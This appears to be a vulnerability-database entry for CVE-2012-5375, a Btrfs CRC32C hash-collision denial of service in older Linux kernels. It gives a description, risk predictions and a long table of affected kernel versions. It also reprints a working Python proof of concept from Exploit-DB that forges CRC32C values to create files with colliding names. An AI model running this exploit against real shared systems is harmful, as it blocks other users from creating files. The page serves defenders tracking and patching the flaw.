CVE-2012-5375

medium

Published 2013-02-18 · Modified 2026-04-29

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS v4 NEW

—

not yet in upstream

VIR risk

5.0

Description

The CRC32C feature in the Btrfs implementation in the Linux kernel before 3.8-rc1 allows local users to cause a denial of service (prevention of file creation) by leveraging the ability to write to a directory important to the victim, and creating a file with a crafted name that is associated with a specific CRC32C hash value.

Predictions

Exploit likelihood

55%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-38132 dos linux verified python · 3 KB

Pascal Junod · 2012-12-13

Linux Kernel 3.3.5 - Btrfs CRC32C feature Infinite Loop Local Denial of Service

python exploit Source: Exploit-DB

source: https://www.securityfocus.com/bid/56939/info

The Linux kernel is prone to a local denial-of-service vulnerability.

Attackers can exploit this issue to cause an infinite loop, resulting in a denial-of-service condition. 

#!/usr/bin/env python

## Borrows code from
"""Calculate and manipulate CRC32.
http://en.wikipedia.org/wiki/Cyclic_redundancy_check
-- StalkR
"""
## See https://github.com/StalkR/misc/blob/master/crypto/crc32.py

import struct
import sys
import os

# Polynoms in reversed notation
POLYNOMS = {
  'CRC-32-IEEE': 0xedb88320, # 802.3
  'CRC-32C': 0x82F63B78, # Castagnoli
  'CRC-32K': 0xEB31D82E, # Koopman
  'CRC-32Q': 0xD5828281,
}

class CRC32(object):
  """A class to calculate and manipulate CRC32.
Use one instance per type of polynom you want to use.
Use calc() to calculate a crc32.
Use forge() to forge crc32 by adding 4 bytes anywhere.
"""
  def __init__(self, type="CRC-32C"):
    if type not in POLYNOMS:
      raise Error("Unknown polynom. %s" % type)
    self.polynom = POLYNOMS[type]
    self.table, self.reverse = [0]*256, [0]*256
    self._build_tables()

  def _build_tables(self):
    for i in range(256):
      fwd = i
      rev = i << 24
      for j in range(8, 0, -1):
        # build normal table
        if (fwd & 1) == 1:
          fwd = (fwd >> 1) ^ self.polynom
        else:
          fwd >>= 1
        self.table[i] = fwd & 0xffffffff
        # build reverse table =)
        if rev & 0x80000000 == 0x80000000:
          rev = ((rev ^ self.polynom) << 1) | 1
        else:
          rev <<= 1
        rev &= 0xffffffff
        self.reverse[i] = rev

  def calc(self, s):
    """Calculate crc32 of a string.
       Same crc32 as in (binascii.crc32)&0xffffffff.
    """
    crc = 0xffffffff
    for c in s:
      crc = (crc >> 8) ^ self.table[(crc ^ ord(c)) & 0xff]
    return crc^0xffffffff

  def forge(self, wanted_crc, s, pos=None):
    """Forge crc32 of a string by adding 4 bytes at position pos."""
    if pos is None:
      pos = len(s)

    # forward calculation of CRC up to pos, sets current forward CRC state
    fwd_crc = 0xffffffff
    for c in s[:pos]:
      fwd_crc = (fwd_crc >> 8) ^ self.table[(fwd_crc ^ ord(c)) & 0xff]

    # backward calculation of CRC up to pos, sets wanted backward CRC state
    bkd_crc = wanted_crc^0xffffffff
    for c in s[pos:][::-1]:
      bkd_crc = ((bkd_crc << 8)&0xffffffff) ^ self.reverse[bkd_crc >> 24] ^ ord(c)

    # deduce the 4 bytes we need to insert
    for c in struct.pack('<L',fwd_crc)[::-1]:
      bkd_crc = ((bkd_crc << 8)&0xffffffff) ^ self.reverse[bkd_crc >> 24] ^ ord(c)

    res = s[:pos] + struct.pack('<L', bkd_crc) + s[pos:]
    return res

if __name__=='__main__':

    hack = False
    ITERATIONS = 10
    crc = CRC32()
    wanted_crc = 0x00000000
    for i in range (ITERATIONS):
      for j in range(55):
        str = os.urandom (16).encode ("hex").strip ("\x00")
        if hack:
            f = crc.forge(wanted_crc, str, 4)
            if ("/" not in f) and ("\x00" not in f):
                file (f, 'a').close()
        else:
            file (str, 'a').close ()

      wanted_crc += 1

OS impact

Linux kernel Affected 142 releases

Version	Status	Fixed in
3.7.9	Affected	—
3.7.8	Affected	—
3.7.7	Affected	—
3.7.6	Affected	—
3.7.5	Affected	—
3.7.4	Affected	—
3.7.3	Affected	—
3.7.2	Affected	—
3.7.1	Affected	—
3.7	Affected	—
3.6.11	Affected	—
3.6.10	Affected	—
3.6.9	Affected	—
3.5.7	Affected	—
3.5.6	Affected	—
3.5.5	Affected	—
3.5.4	Affected	—
3.5.3	Affected	—
3.5.2	Affected	—
3.5.1	Affected	—
3.4.24	Affected	—
3.4.23	Affected	—
3.4.22	Affected	—
3.4.21	Affected	—
3.4.20	Affected	—
3.4.19	Affected	—
3.4.18	Affected	—
3.4.17	Affected	—
3.4.16	Affected	—
3.4.15	Affected	—
3.4.14	Affected	—
3.4.13	Affected	—
3.4.12	Affected	—
3.4.11	Affected	—
3.4.10	Affected	—
3.4.9	Affected	—
3.4.8	Affected	—
3.4.7	Affected	—
3.4.6	Affected	—
3.4.5	Affected	—
3.4.4	Affected	—
3.4.3	Affected	—
3.4.2	Affected	—
3.4.1	Affected	—
3.4	Affected	—
3.3.8	Affected	—
3.3.7	Affected	—
3.3.6	Affected	—
3.3.5	Affected	—
3.3.4	Affected	—
3.3.3	Affected	—
3.3.2	Affected	—
3.3.1	Affected	—
3.3	Affected	—
3.2.30	Affected	—
3.2.29	Affected	—
3.2.28	Affected	—
3.2.27	Affected	—
3.2.26	Affected	—
3.2.25	Affected	—
3.2.24	Affected	—
3.2.23	Affected	—
3.2.22	Affected	—
3.2.21	Affected	—
3.2.20	Affected	—
3.2.19	Affected	—
3.2.18	Affected	—
3.2.17	Affected	—
3.2.16	Affected	—
3.2.15	Affected	—
3.2.14	Affected	—
3.2.13	Affected	—
3.2.12	Affected	—
3.2.11	Affected	—
3.2.10	Affected	—
3.2.9	Affected	—
3.2.8	Affected	—
3.2.7	Affected	—
3.2.6	Affected	—
3.2.5	Affected	—
3.2.4	Affected	—
3.2.3	Affected	—
3.2.2	Affected	—
3.2.1	Affected	—
3.2	Affected	—
3.1.10	Affected	—
3.1.9	Affected	—
3.1.8	Affected	—
3.1.7	Affected	—
3.1.6	Affected	—
3.1.5	Affected	—
3.1.4	Affected	—
3.1.3	Affected	—
3.1.2	Affected	—
3.1.1	Affected	—
3.1	Affected	—
3.0.44	Affected	—
3.0.43	Affected	—
3.0.42	Affected	—
3.0.41	Affected	—
3.0.40	Affected	—
3.0.39	Affected	—
3.0.38	Affected	—
3.0.37	Affected	—
3.0.36	Affected	—
3.0.35	Affected	—
3.0.34	Affected	—
3.0.33	Affected	—
3.0.32	Affected	—
3.0.31	Affected	—
3.0.30	Affected	—
3.0.29	Affected	—
3.0.28	Affected	—
3.0.27	Affected	—
3.0.26	Affected	—
3.0.25	Affected	—
3.0.24	Affected	—
3.0.23	Affected	—
3.0.22	Affected	—
3.0.21	Affected	—
3.0.20	Affected	—
3.0.19	Affected	—
3.0.18	Affected	—
3.0.17	Affected	—
3.0.16	Affected	—
3.0.15	Affected	—
3.0.14	Affected	—
3.0.13	Affected	—
3.0.12	Affected	—
3.0.11	Affected	—
3.0.10	Affected	—
3.0.9	Affected	—
3.0.8	Affected	—
3.0.7	Affected	—
3.0.6	Affected	—
3.0.5	Affected	—
3.0.4	Affected	—
3.0.3	Affected	—
3.0.2	Affected	—
3.0.1	Affected	—
3.0	Affected	—
—	Affected	—

Debian Fixed 5 releases

Version	Status	Fixed in
trixie	Fixed	`3.8-1`
sid	Fixed	`3.8-1`
forky	Fixed	`3.8-1`
bullseye	Fixed	`3.8-1`
bookworm	Fixed	`3.8-1`

References

CWEs

CWE-310

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.